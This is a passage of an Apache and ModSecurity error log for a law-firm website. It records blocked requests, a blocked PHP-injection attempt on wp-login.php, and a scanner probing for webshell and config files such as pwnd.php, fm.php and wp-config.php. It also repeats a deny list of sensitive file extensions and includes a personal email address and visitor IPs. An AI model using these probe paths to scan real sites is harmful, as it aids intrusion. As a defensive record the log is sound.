"ac03tWsH25ndavKe06A6bgAAAdE"], referer: https://elavocato.net/ar/about-us [Wed Apr 01 17:20:28.040910 2026] [:error] [pid 30524:tid 30566] [client 74.7.243.209:34722] [client 74.7.243.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac03vGsH25ndavKe06A60AAAAc4"], referer: https://elavocato.net/ar/service/11 [Wed Apr 01 17:20:53.618736 2026] [:error] [pid 26573:tid 26607] [client 74.7.243.209:43050] [client 74.7.243.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac031VdSgxBhwPw1Ebr5RQAAARg"], referer: https://elavocato.net/en/our-team [Wed Apr 01 17:20:59.054904 2026] [:error] [pid 30524:tid 30561] [client 74.7.243.209:38364] [client 74.7.243.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac0322sH25ndavKe06A8lwAAAck"], referer: https://elavocato.net/en/service/2 [Wed Apr 01 17:21:32.269041 2026] [core:error] [pid 30524:tid 30553] [client 74.7.243.209:59066] AH10244: invalid URI path (/themes/primary/js/%url%), referer: https://elavocato.net/themes/primary/js/jquery.magnific-popup.min.js [Wed Apr 01 20:17:22.038572 2026] [autoindex:error] [pid 30524:tid 30568] [client 185.245.183.158:61908] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 01 22:51:03.401246 2026] [:error] [pid 30525:tid 30612] [client 69.63.184.18:56060] [client 69.63.184.18] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-512000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "elavocato.net"] [uri "/robots.txt"] [unique_id "ac2FN97qKehqmSTZQxwrnQAAAhc"] [Wed Apr 01 22:51:23.421060 2026] [autoindex:error] [pid 26573:tid 26605] [client 185.153.151.180:58334] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Apr 01 22:51:31.115504 2026] [autoindex:error] [pid 30524:tid 30570] [client 185.153.151.180:53474] AH01276: Cannot serve directory /home/mysuits1/alavocato.mysuits.app/public/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Apr 02 00:05:24.481669 2026] [:error] [pid 30524:tid 30569] [client 57.141.0.22:34979] [client 57.141.0.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac2WpGsH25ndavKe06BJdwAAAdE"] [Thu Apr 02 00:12:37.278489 2026] [:error] [pid 30524:tid 30569] [client 57.141.0.66:27827] [client 57.141.0.66] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac2YVWsH25ndavKe06BdnQAAAdE"] [Thu Apr 02 00:52:28.834010 2026] [:error] [pid 30524:tid 30568] [client 57.141.0.45:24059] [client 57.141.0.45] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac2hrGsH25ndavKe06DMYwAAAdA"] [Thu Apr 02 01:41:56.995779 2026] [:error] [pid 30524:tid 30575] [client 57.141.0.60:55983] [client 57.141.0.60] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac2tRGsH25ndavKe06BdfgAAAdc"] [Thu Apr 02 02:16:03.560499 2026] [:error] [pid 30524:tid 30561] [client 54.39.6.69:41050] [client 54.39.6.69] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac21Q2sH25ndavKe06DBBAAAAck"] [Thu Apr 02 03:19:32.722591 2026] [:error] [pid 3437:tid 3541] [client 57.141.0.38:35017] [client 57.141.0.38] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac3EJGc0odzVMFZ-9PY3pwAAAFI"] [Thu Apr 02 06:18:18.480781 2026] [:error] [pid 18344:tid 18420] [client 54.39.203.28:45298] [client 54.39.203.28] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac3uCsQBuQpbVViTqcLotQAAAIU"] [Thu Apr 02 08:01:12.602953 2026] [:error] [pid 18537:tid 18564] [client 148.113.130.75:59558] [client 148.113.130.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/ar/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac4GKM4jo74RVindsRETIgAAANg"] [Thu Apr 02 15:01:47.996290 2026] [:error] [pid 20309:tid 20311] [client 54.39.0.152:64398] [client 54.39.0.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac5ou_XaGhoFhuC8sTzeJwAAAQA"] [Thu Apr 02 17:50:36.827145 2026] [:error] [pid 18537:tid 18557] [client 158.101.30.84:53898] [client 158.101.30.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:pwd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "elavocato.net"] [uri "/wp-login.php"] [unique_id "ac6QTM4jo74RVindsRGjYQAAANE"], referer: https://elavocato.net/wp-login.php [Thu Apr 02 17:54:50.762357 2026] [:error] [pid 20309:tid 20316] [client 69.63.184.14:40712] [client 69.63.184.14] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-512000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "elavocato.net"] [uri "/robots.txt"] [unique_id "ac6RSvXaGhoFhuC8sTyEwQAAAQU"] [Thu Apr 02 18:06:45.167009 2026] [:error] [pid 20309:tid 20320] [client 54.39.210.68:28364] [client 54.39.210.68] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/en/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac6UFfXaGhoFhuC8sTyn5QAAAQk"] [Fri Apr 03 02:28:21.262995 2026] [:error] [pid 22004:tid 22021] [client 20.151.229.110:34779] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/pwnd.php [Fri Apr 03 02:28:27.350832 2026] [:error] [pid 31689:tid 31744] [client 20.151.229.110:34772] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/siteindex.php [Fri Apr 03 02:28:33.545860 2026] [:error] [pid 22004:tid 22020] [client 20.151.229.110:34779] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/fm.php [Fri Apr 03 11:36:43.984703 2026] [:error] [pid 5223:tid 5227] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Fri Apr 03 11:36:56.295271 2026] [:error] [pid 5223:tid 5227] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Apr 03 11:36:57.725018 2026] [:error] [pid 5223:tid 5227] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Fri Apr 03 11:37:02.546242 2026] [:error] [pid 5223:tid 5241] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Fri Apr 03 11:37:03.173437 2026] [:error] [pid 5223:tid 5241] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Fri Apr 03 11:37:10.675199 2026] [:error] [pid 5223:tid 5239] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Apr 03 11:37:12.073508 2026] [:error] [pid 5223:tid 5227] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Fri Apr 03 11:37:14.276822 2026] [:error] [pid 5223:tid 5237] [client 20.194.110.188:2424] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-config.php [Fri Apr 03 11:37:20.661504 2026] [:error] [pid 5223:tid 5242] [client 20.194.110.188:2929] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Fri Apr 03 11:37:27.776534 2026] [:error] [pid 5223:tid 5227] [client 20.194.110.188:2929] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Apr 03 11:37:33.928565 2026] [:error] [pid 5223:tid 5248] [client 20.194.110.188:2929] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Apr 03 11:37:34.176220 2026] [:error] [pid 5223:tid 5249] [client 20.194.110.188:2929] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Apr 03 11:37:55.508490 2026] [:error] [pid 5223:tid 5231] [client 20.194.110.188:2929] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Apr 03 11:37:55.766596 2026] [:error] [pid 5223:tid 5243] [client 20.194.110.188:2929] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Apr 03 13:11:29.666804 2026] [:error] [pid 15948:tid 16020] [client 149.224.50.122:62100] [client 149.224.50.122] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac-gYYwX7mV-z4TfJyJNfgAAAQY"] [Fri Apr 03 13:35:12.685793 2026] [:error] [pid 18547:tid 18571] [client 173.252.82.15:56560] [client 173.252.82.15] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-512000"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "elavocato.net"] [uri "/robots.txt"] [unique_id "ac-l8LJf01uCe8eluSuRswAAAZU"] [Fri Apr 03 14:52:39.127229 2026] [:error] [pid 15948:tid 16025] [client 184.154.139.58:33242] [client 184.154.139.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac-4F4wX7mV-z4TfJyI1OwAAAQo"] [Fri Apr 03 14:52:40.868084 2026] [:error] [pid 15948:tid 16035] [client 184.154.139.58:33808] [client 184.154.139.58] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.elavocato.net"] [uri "/ar/service/mahmoudsaberabouhelwa@gmail.com"] [unique_id "ac-4GIwX7mV-z4TfJyI1VQAAARQ"] [Fri Apr 03 15:44:44.107472 2026] [:error] [pid 18547:tid 18565] [client 51.77.217.11:57434] [client 51.77.217.11] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ 